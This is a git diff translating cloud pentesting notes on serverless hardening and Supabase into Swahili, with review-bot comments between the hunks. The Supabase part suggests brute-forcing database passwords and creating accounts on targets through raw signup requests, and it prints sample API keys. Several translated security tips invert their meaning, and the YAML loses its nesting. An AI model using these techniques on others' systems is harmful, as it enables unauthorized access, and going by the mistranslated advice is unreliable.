-- **Static Analysis:** Use tools to detect vulnerabilities in the codebase.
+- **Uthibitishaji wa Ingizo:** Tekeleza uthibitishaji mkali na usafi wa ingizo zote.
+- **Mapitio ya Msimbo:** Fanya mapitio ya kina ili kubaini kasoro za usalama.
+- **Analizi ya Kijamii:** Tumia zana kugundua udhaifu katika msingi wa msimbo.
---
-### **Inadequate Logging and Monitoring**
+### **Kukosa Kurekodi na Kufuata**
-Without proper logging and monitoring, malicious activities may go undetected, delaying incident response.
+Bila kurekodi na kufuatilia vizuri, shughuli za uhalifu zinaweza kukosa kugunduliwa, kuchelewesha majibu ya tukio.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**.
+- **Kurekodi Kati:** Punguza kumbukumbu kwa kutumia huduma kama **AWS CloudWatch** au **Datadog**.
- ```yaml
- plugins:
- - serverless-plugin-datadog
- ```
+```yaml
+plugins:
+- serverless-plugin-datadog
+```
-- **Enable Detailed Logging:** Capture essential information without exposing sensitive data.
-- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies.
-- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents.
+- **Washa Kurekodi Kwa Kina:** Pata taarifa muhimu bila kufichua data nyeti.
+- **Weka Arifa:** Sanidi arifa kwa shughuli au tofauti za kushangaza.
+- **Kufuata Mara kwa Mara:** Fuata mara kwa mara kumbukumbu na vipimo kwa matukio ya usalama yanayoweza kutokea.
---
-### **Insecure API Gateway Configurations**
+### **Mikakati ya API Gateway Isiyo Salama**
-Open or improperly secured APIs can be exploited for unauthorized access, Denial of Service (DoS) attacks, or cross-site attacks.
+APIs zilizo wazi au zisizo salama zinaweza kutumika kwa ufikiaji usioidhinishwa, mashambulizi ya Denial of Service (DoS), au mashambulizi ya tovuti.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT.
+- **Uthibitishaji na Uidhinishaji:** Tekeleza mifumo thabiti kama OAuth, funguo za API, au JWT.
- ```yaml
- functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
- authorizer: aws_iam
- ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+authorizer: aws_iam
+```
-- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates.
+- **Kukataza Kiwango na Kuchelewesha:** Zuia matumizi mabaya kwa kupunguza viwango vya maombi.
- ```yaml
- provider:
- apiGateway:
- throttle:
- burstLimit: 200
- rateLimit: 100
- ```
+```yaml
+provider:
+apiGateway:
+throttle:
+burstLimit: 200
+rateLimit: 100
+```
-- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers.
+- **Sanidi CORS Salama:** Punguza asili, mbinu, na vichwa vinavyoruhusiwa.
- ```yaml
- functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
- cors:
- origin: https://yourdomain.com
- headers:
- - Content-Type
- ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+cors:
+origin: https://yourdomain.com
+headers:
+- Content-Type
+```
-- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns.
+- **Tumia Firewalls za Programu za Mtandao (WAF):** Chuja na fuatilia maombi ya HTTP kwa mifumo ya uhalifu.
---
-### **Insufficient Function Isolation**
+### **Kukosa Kutengwa kwa Kazi**
-Shared resources and inadequate isolation can lead to privilege escalations or unintended interactions between functions.
+Rasilimali zinazoshirikiwa na kutengwa kwa kutosha kunaweza kusababisha kupanda kwa mamlaka au mwingiliano usio na makusudi kati ya kazi.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation.
-- **Resource Partitioning:** Use separate databases or storage buckets for different functions.
-- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation.
+- **Tenga Kazi:** Panga rasilimali tofauti na majukumu ya IAM ili kuhakikisha uendeshaji huru.
+- **Kugawanya Rasilimali:** Tumia hifadhidata tofauti au ndoo za kuhifadhi kwa kazi tofauti.
+- **Tumia VPCs:** Weka kazi ndani ya Mifumo ya Kibinafsi ya Mtandao kwa kutengwa kwa mtandao iliyoimarishwa.
- ```yaml
- provider:
- vpc:
- securityGroupIds:
- - sg-xxxxxxxx
- subnetIds:
- - subnet-xxxxxx
- ```
+```yaml
+provider:
+vpc:
+securityGroupIds:
+- sg-xxxxxxxx
+subnetIds:
+- subnet-xxxxxx
+```
-- **Limit Function Permissions:** Ensure functions cannot access or interfere with each otherās resources unless explicitly required.
+- **Punguza Ruhusa za Kazi:** Hakikisha kazi haziwezi kufikia au kuingilia rasilimali za kila mmoja isipokuwa inahitajika wazi.
---
-### **Inadequate Data Protection**
+### **Kukosa Ulinzi wa Data**
-Unencrypted data at rest or in transit can be exposed, leading to data breaches or tampering.
+Data isiyosimbwa katika hali ya kupumzika au katika usafiri inaweza kufichuliwa, ikisababisha uvunjaji wa data au uharibifu.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Encrypt Data at Rest:** Utilize cloud service encryption features.
+- **Simbua Data Katika Hali ya Kupumzika:** Tumia vipengele vya usimbaji vya huduma za wingu.
- ```yaml
- resources:
- Resources:
- MyDynamoDBTable:
- Type: AWS::DynamoDB::Table
- Properties:
- SSESpecification:
- SSEEnabled: true
- ```
+```yaml
+resources:
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+SSESpecification:
+SSEEnabled: true
+```
-- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions.
-- **Secure API Communication:** Enforce encryption protocols and validate certificates.
-- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly.
+- **Simbua Data Katika Usafiri:** Tumia HTTPS/TLS kwa usafiri wote wa data.
+- **Wasiliana kwa API Salama:** Lazimisha itifaki za usimbaji na kuthibitisha vyeti.
+- **Simamisha Funguo za Usimbaji kwa Usalama:** Tumia huduma za funguo zinazodhibitiwa na kubadilisha funguo mara kwa mara.
---
-### **Lack of Proper Error Handling**
+### **Kukosa Usimamizi wa Makosa Sahihi**
-Detailed error messages can leak sensitive information about the infrastructure or codebase, while unhandled exceptions may lead to application crashes.
+Ujumbe wa makosa wa kina unaweza kufichua taarifa nyeti kuhusu miundombinu au msingi wa msimbo, wakati makosa yasiyoshughulikiwa yanaweza kusababisha kuanguka kwa programu.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Generic Error Messages:** Avoid exposing internal details in error responses.
+- **Ujumbe wa Makosa ya Jumla:** Epuka kufichua maelezo ya ndani katika majibu ya makosa.
- ```javascript
- javascriptCopy code// Example in Node.js
- exports.hello = async (event) => {
- try {
- // Function logic
- } catch (error) {
- console.error(error);
- return {
- statusCode: 500,
- body: JSON.stringify({ message: 'Internal Server Error' }),
- };
- }
- };
- ```
+```javascript
+javascriptCopy code// Mfano katika Node.js
+exports.hello = async (event) => {
+try {
+// Mantiki ya kazi
+} catch (error) {
+console.error(error);
+return {
+statusCode: 500,
+body: JSON.stringify({ message: 'Internal Server Error' }),
+};
+}
+};
+```
-- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions.
-- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users.
+- **Usimamizi wa Makosa Kati:** Simamia na safisha makosa kwa njia ya kawaida katika kazi zote.
+- **Fuatilia na Kurekodi Makosa:** Fuata na changanua makosa ndani bila kufichua maelezo kwa watumiaji wa mwisho.
---
-### **Insecure Deployment Practices**
+### **Mikakati ya Utekelezaji Isiyo Salama**
-Exposed deployment configurations or unauthorized access to CI/CD pipelines can lead to malicious code deployments or misconfigurations.
+Mikakati ya utekelezaji iliyofichuliwa au ufikiaji usioidhinishwa kwa mabomba ya CI/CD inaweza kusababisha utekelezaji wa msimbo wa uhalifu au mipangilio isiyo sahihi.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits.
-- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data.
-- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies.
-- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices.
+- **Salama Mabomba ya CI/CD:** Tekeleza udhibiti mkali wa ufikiaji, uthibitishaji wa hatua nyingi (MFA), na ukaguzi wa mara kwa mara.
+- **Hifadhi Mipangilio kwa Usalama:** Hifadhi faili za utekelezaji bila siri zilizofichwa na data nyeti.
+- **Tumia Zana za Usalama za Miundombinu kama Msimbo (IaC):** Tumia zana kama **Checkov** au **Terraform Sentinel** kutekeleza sera za usalama.
+- **Utekelezaji Usio Badilika:** Zuia mabadiliko yasiyoidhinishwa baada ya utekelezaji kwa kupitisha mazoea ya miundombinu isiyobadilika.
---
-### **Vulnerabilities in Plugins and Extensions**
+### **Udhaifu katika Plugins na Nyongeza**
-Using unvetted or malicious third-party plugins can introduce vulnerabilities into your serverless applications.
+Kutumia plugins za tatu zisizokaguliwa au zenye uhalifu kunaweza kuleta udhaifu katika programu zako za serverless.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources.
-- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface.
-- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches.
-- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises.
+- **Kagua Plugins kwa Kina:** Kadiria usalama wa plugins kabla ya kuingizwa, ukipendelea zile kutoka vyanzo vinavyoaminika.
+- **Punguza Matumizi ya Plugins:** Tumia tu plugins zinazohitajika ili kupunguza uso wa shambulio.
+- **Fuatilia Sasisho za Plugins:** Hifadhi plugins zikiwa na sasisho ili kufaidika na patches za usalama.
+- **Tenga Mazingira ya Plugins:** Endesha plugins katika mazingira yaliyotengwa ili kudhibiti hatari zinazoweza kutokea.
---
-### **Exposure of Sensitive Endpoints**
+### **Kufichua kwa Mipangilio Nyeti**
-Publicly accessible functions or unrestricted APIs can be exploited for unauthorized operations.
+Kazi zinazopatikana kwa umma au APIs zisizo na mipaka zinaweza kutumika kwa shughuli zisizoidhinishwa.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources.
-- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization.
-- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting.
-- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use.
+- **Punguza Ufikiaji wa Kazi:** Tumia VPCs, vikundi vya usalama, na sheria za moto ili kupunguza ufikiaji kwa vyanzo vinavyoaminika.
+- **Tekeleza Uthibitishaji Thabiti:** Hakikisha kwamba mipangilio yote iliyofichuliwa inahitaji uthibitishaji na uidhinishaji sahihi.
+- **Tumia Mabango ya API kwa Usalama:** Sanidi Mabango ya API kutekeleza sera za usalama, ikiwa ni pamoja na uthibitishaji wa ingizo na kukataza kiwango.
+- **Zima Mipangilio Isiyotumika:** Kagua mara kwa mara na zima mipangilio yoyote ambayo haitumiki tena.
---
-### **Excessive Permissions for Team Members and External Collaborators**
+### **Ruhusa Kupita Kiasi kwa Wajumbe wa Timu na Washirikishi wa Nje**
-Granting excessive permissions to team members and external collaborators can lead to unauthorized access, data breaches, and misuse of resources. This risk is heightened in environments where multiple individuals have varying levels of access, increasing the attack surface and potential for insider threats.
+Kutoa ruhusa kupita kiasi kwa wajumbe wa timu na washirikishi wa nje kunaweza kusababisha ufikiaji usioidhinishwa, uvunjaji wa data, na matumizi mabaya ya rasilimali. Hatari hii inaongezeka katika mazingira ambapo watu wengi wana viwango tofauti vya ufikiaji, ikiongeza uso wa shambulio na uwezekano wa vitisho vya ndani.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks.
+- **Kanuni ya Ruhusa Ndogo:** Hakikisha kwamba wajumbe wa timu na washirikishi wana ruhusa tu zinazohitajika kutekeleza majukumu yao.
---
-### **Access Keys and License Keys Security**
+### **Usalama wa Funguo za Ufikiaji na Funguo za Leseni**
-**Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI.
+**Funguo za Ufikiaji** na **Funguo za Leseni** ni ithibati muhimu zinazotumika kuthibitisha na kuidhinisha mwingiliano na CLI ya Serverless Framework.
-- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI.
-- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`.
+- **Funguo za Leseni:** Ni vitambulisho vya kipekee vinavyohitajika kwa uthibitishaji wa ufikiaji kwa Serverless Framework Toleo la 4 ambalo linaruhusu kuingia kupitia CLI.
+- **Funguo za Ufikiaji:** Ithibati zinazoruhusu CLI ya Serverless Framework kuthibitisha na Dashibodi ya Serverless Framework. Wakati wa kuingia na `serverless` cli funguo ya ufikiaji itaundwa na **kuhifadhiwa kwenye laptop**. Unaweza pia kuiseti kama mabadiliko ya mazingira yanayoitwa `SERVERLESS_ACCESS_KEY`.
-#### **Security Risks**
+#### **Hatari za Usalama**
-1. **Exposure Through Code Repositories:**
- - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access.
-2. **Insecure Storage:**
- - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage.
-3. **Improper Distribution:**
- - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors.
-4. **Lack of Rotation:**
- - Not regularly rotating keys extends the exposure period if keys are compromised.
-5. **Excessive Permissions:**
- - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources.
+1. **Kufichuliwa Kupitia Hifadhi za Msimbo:**
+- Kuweka au kwa bahati mbaya kupeleka Funguo za Ufikiaji na Funguo za Leseni kwenye mifumo ya kudhibiti toleo kunaweza kusababisha ufikiaji usioidhinishwa.
+2. **Hifadhi Isiyo Salama:**
+- Kuhifadhi funguo katika maandiko wazi ndani ya mabadiliko ya mazingira au faili za mipangilio bila usimbaji sahihi kunaongeza uwezekano wa kufichuliwa.
+3. **Usambazaji Mbaya:**
+- Kushiriki funguo kupitia njia zisizo salama (k.m., barua pepe, gumzo) kunaweza kusababisha kukamatwa na wahalifu.
+4. **Kukosa Mzunguko:**
+- Kutokuzungusha funguo mara kwa mara kunaongeza kipindi cha kufichuliwa ikiwa funguo zitavunjwa.
+5. **Ruhusa Kupita Kiasi:**
+- Funguo zenye ruhusa pana zinaweza kutumika kufanya vitendo visivyoidhinishwa katika rasilimali nyingi.
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
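Review bot: the translated YAML snippets in this hunk have lost all their indentation, so they are no longer valid YAML and no longer render as nested under their bullet; in the least-privilege example `provider:`, `iam:`, `role:` and `statements:` now all sit at column 0, and the same flattening hits the `apiGateway:`/`throttle:` block, the `cors:` block, the `vpc:` block and the `resources:` DynamoDB `SSESpecification` block (the JSON policy also lost its indentation, it still parses but is much harder to read). Please restore the original nesting before merging, e.g. `provider:` / `  iam:` / `    role:` / `      statements:` for the IAM example. Two smaller points in the same hunk: the `javascriptCopy code` copy-button residue at the top of the Node.js error-handling example was carried over and should be dropped, and the English sentence starting "And even if this prevents hardcoding the environment variable value" was left untranslated between translated neighbours. Finally, several translated headings change the meaning of the security advice and should be re-checked by a Swahili speaker: "Simbua Data" reads as "decrypt data" rather than "encrypt data", "Punguza kumbukumbu" reads as "reduce logs" rather than "aggregate logs", "Analizi ya Kijamii" means "social analysis" where the source says "Static Analysis", and "Msimbo na Kazi Zenye Ukatili" does not convey "Vulnerable Code and Dependencies"; keeping tool and concept names such as "Static Analysis" in English is preferable to a wrong translation.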
diff --git a/src/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md
index 6fa6219f8..e14e8cc26 100644
--- a/src/pentesting-ci-cd/supabase-security.md
+++ b/src/pentesting-ci-cd/supabase-security.md
@@ -1,50 +1,49 @@
-# Supabase Security
+# Usalama wa Supabase
{{#include ../banners/hacktricks-training.md}}
-## Basic Information
+## Taarifa za Msingi
-As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.
+Kulingana na [**ukurasa wao wa kutua**](https://supabase.com/): Supabase ni mbadala wa Firebase wa chanzo wazi. Anza mradi wako na hifadhidata ya Postgres, Uthibitishaji, APIs za papo hapo, Kazi za Edge, usajili wa Realtime, Hifadhi, na uwasilishaji wa Vector.
### Subdomain
-Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`**
+Kimsingi, wakati mradi unaundwa, mtumiaji atapata subdomain ya supabase.co kama: **`jnanozjdybtpqgcwhdiz.supabase.co`**
-## **Database configuration**
+## **Mipangilio ya Hifadhidata**
> [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`**
+> **Taarifa hii inaweza kupatikana kutoka kiungo kama `https://supabase.com/dashboard/project//settings/database`**
-This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\
-The password is a **password the user put** previously.
+Hii **hifadhidata** itapelekwa katika eneo fulani la AWS, na ili kuungana nayo itakuwa inawezekana kuungana na: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (hii iliundwa katika us-west-1).\
+Neno la siri ni **neno la siri ambalo mtumiaji aliweka** awali.
-Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**.
+Kwa hivyo, kwa kuwa subdomain ni maarufu na inatumika kama jina la mtumiaji na maeneo ya AWS ni ya kikomo, inaweza kuwa inawezekana kujaribu **kuvunjavunja nenosiri**.
-This section also contains options to:
+Sehemu hii pia ina chaguzi za:
-- Reset the database password
-- Configure connection pooling
-- Configure SSL: Reject plan-text connections (by default they are enabled)
-- Configure Disk size
-- Apply network restrictions and bans
+- Kurekebisha nenosiri la hifadhidata
+- Kuunda muunganisho wa pooling
+- Kuunda SSL: Kata muunganisho wa maandiko (kwa kawaida zimewezeshwa)
+- Kuunda ukubwa wa Diski
+- Kutumia vizuizi na marufuku za mtandao
-## API Configuration
+## Mipangilio ya API
> [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`**
+> **Taarifa hii inaweza kupatikana kutoka kiungo kama `https://supabase.com/dashboard/project//settings/api`**
-The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
+URL ya kufikia API ya supabase katika mradi wako itakuwa kama: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
-### anon api keys
+### funguo za anon api
-It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in
+Itazalisha pia **funguo ya API ya anon** (`role: "anon"`), kama: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` ambayo programu itahitaji kutumia ili kuwasiliana na funguo ya API iliyofichuliwa katika mfano wetu katika
-It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be:
+Inawezekana kupata API REST ya kuwasiliana na API hii katika [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), lakini mwisho wa kuvutia zaidi ungekuwa:
-Signup (/auth/v1/signup)
-
+Usajili (/auth/v1/signup)
```
POST /auth/v1/signup HTTP/2
Host: id.io.net
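Review bot: the translated anon-key paragraph still ends mid-sentence ("... funguo ya API iliyofichuliwa katika mfano wetu katika"), faithfully reproducing the truncated English source ("... exposed in our example in"); since the translation pass is touching that line anyway, either finish the sentence from the source author or flag it rather than shipping the dangling "katika". Likewise both dashboard links keep the empty project segment `https://supabase.com/dashboard/project//settings/...`, which is a pre-existing placeholder gap, not a translation error, but worth a `<project-ref>` marker so readers do not take the double slash as literal.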
@@ -69,13 +68,11 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
-
-Login (/auth/v1/token?grant_type=password)
-
+Ingia (/auth/v1/token?grant_type=password)
```
POST /auth/v1/token?grant_type=password HTTP/2
Host: hypzbtgspjkludjcnjxl.supabase.co
@@ -100,68 +97,63 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
-
-So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**.
+Hivyo, kila wakati unapotambua mteja anayetumia supabase na subdomain waliyotolewa (inawezekana kwamba subdomain ya kampuni ina CNAME juu ya subdomain yao ya supabase), unaweza kujaribu **kuunda akaunti mpya kwenye jukwaa kwa kutumia supabase API**.
-### secret / service_role api keys
+### funguo za siri / service_role api
-A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**.
+Funguo ya siri ya API pia itaundwa na **`role: "service_role"`**. Funguo hii ya API inapaswa kuwa ya siri kwa sababu itakuwa na uwezo wa kupita **Row Level Security**.
-The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
+Funguo ya API inaonekana kama hii: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
-### JWT Secret
+### JWT Siri
-A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**.
+**JWT Siri** pia itaundwa ili programu iweze **kuunda na kusaini token za JWT za kawaida**.
-## Authentication
+## Uthibitishaji
-### Signups
+### Usajili
> [!TIP]
-> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints.
+> Kwa **kawaida** supabase itaruhusu **watumiaji wapya kuunda akaunti** kwenye mradi wako kwa kutumia viungo vya API vilivyotajwa hapo awali.
-However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\
-This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those:
+Hata hivyo, akaunti hizi mpya, kwa kawaida, **zitahitaji kuthibitisha anwani yao ya barua pepe** ili waweze kuingia kwenye akaunti. Inawezekana kuwezesha **"Ruhusu kuingia kwa siri"** ili kuruhusu watu kuingia bila kuthibitisha anwani yao ya barua pepe. Hii inaweza kutoa ufikiaji wa **data zisizotarajiwa** (wanapata majukumu `public` na `authenticated`).\
+Hii ni wazo mbaya sana kwa sababu supabase inatoza kwa kila mtumiaji aliye hai hivyo watu wanaweza kuunda watumiaji na kuingia na supabase itatoza kwa hao:
-### Passwords & sessions
+### Nywila & vikao
-It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\
-It's recommended to **improve the requirements as the default ones are weak**.
+Inawezekana kuashiria urefu wa chini wa nywila (kwa kawaida), mahitaji (hapana kwa kawaida) na kuzuia matumizi ya nywila zilizovuja.\
+Inapendekezwa **kuboresha mahitaji kwani yale ya kawaida ni dhaifu**.
-- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...)
-- Bot and Abuse Protection: It's possible to enable Captcha.
+- Vikao vya Watumiaji: Inawezekana kusanidi jinsi vikao vya watumiaji vinavyofanya kazi (muda wa kuisha, kikao 1 kwa mtumiaji...)
+- Ulinzi wa Bot na Dhuluma: Inawezekana kuwezesha Captcha.
-### SMTP Settings
+### Mipangilio ya SMTP
-It's possible to set an SMTP to send emails.
+Inawezekana kuweka SMTP kutuma barua pepe.
-### Advanced Settings
+### Mipangilio ya Juu
-- Set expire time to access tokens (3600 by default)
-- Set to detect and revoke potentially compromised refresh tokens and timeout
-- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default)
-- Max Direct Database Connections: Max number of connections used to auth (10 by default)
-- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default)
+- Weka muda wa kuisha kwa funguo za ufikiaji (3600 kwa kawaida)
+- Weka kugundua na kufuta funguo za upya zinazoweza kuwa na hatari na muda wa kuisha
+- MFA: Onyesha ni vigezo vingapi vya MFA vinaweza kuandikishwa kwa wakati mmoja kwa mtumiaji (10 kwa kawaida)
+- Max Direct Database Connections: Idadi ya juu ya muunganisho inayotumika kuthibitisha (10 kwa kawaida)
+- Max Request Duration: Muda wa juu unaoruhusiwa kwa ombi la Auth kudumu (10s kwa kawaida)
-## Storage
+## Hifadhi
> [!TIP]
-> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets).
+> Supabase inaruhusu **kuhifadhi faili** na kuzipatia ufikiaji kupitia URL (inatumia S3 buckets).
-- Set the upload file size limit (default is 50MB)
-- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
-- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
+- Weka kikomo cha ukubwa wa faili zinazopakiwa (kawaida ni 50MB)
+- Muunganisho wa S3 unapatikana kwa URL kama: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
+- Inawezekana **kuomba funguo za ufikiaji za S3** ambazo zinaundwa na `access key ID` (mfano `a37d96544d82ba90057e0e06131d0a7b`) na `secret access key` (mfano `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
## Edge Functions
-It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly).
+Inawezekana **kuhifadhi siri** katika supabase pia ambazo zitakuwa **zinapatikana na edge functions** (zinaweza kuundwa na kufutwa kutoka kwenye wavuti, lakini haiwezekani kufikia thamani yao moja kwa moja).
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
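Review bot: the Supabase dashboard option "Allow anonymous sign-ins" has been translated as "Ruhusu kuingia kwa siri", which reads as "allow secret logins" and no longer matches the name a reader will see in the Auth settings UI or the meaning (anonymous accounts, not hidden ones); UI option names should stay verbatim in English, as this hunk already does for "Max Direct Database Connections" and "Max Request Duration". Same point for the heading "JWT Siri", which should either stay as "JWT Secret" or become "Siri ya JWT" so it is not read as a JWT named "Siri".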
diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md
index 09b875ff2..9ec947c63 100644
--- a/src/pentesting-ci-cd/terraform-security.md
+++ b/src/pentesting-ci-cd/terraform-security.md
@@ -6,303 +6,273 @@
[From the docs:](https://developer.hashicorp.com/terraform/intro)
-HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
+HashiCorp Terraform ni **chombo cha miundombinu kama msimbo** ambacho kinakuruhusu kufafanua **rasilimali za wingu na za ndani** katika faili za usanidi zinazoweza kusomeka na binadamu ambazo unaweza kuandika, kutumia tena, na kushiriki. Kisha unaweza kutumia mtiririko wa kazi unaofanana ili kuandaa na kusimamia miundombinu yako yote wakati wa mzunguko wake wa maisha. Terraform inaweza kusimamia vipengele vya chini kama vile kompyuta, uhifadhi, na rasilimali za mtandao, pamoja na vipengele vya juu kama vile entries za DNS na vipengele vya SaaS.
#### How does Terraform work?
-Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
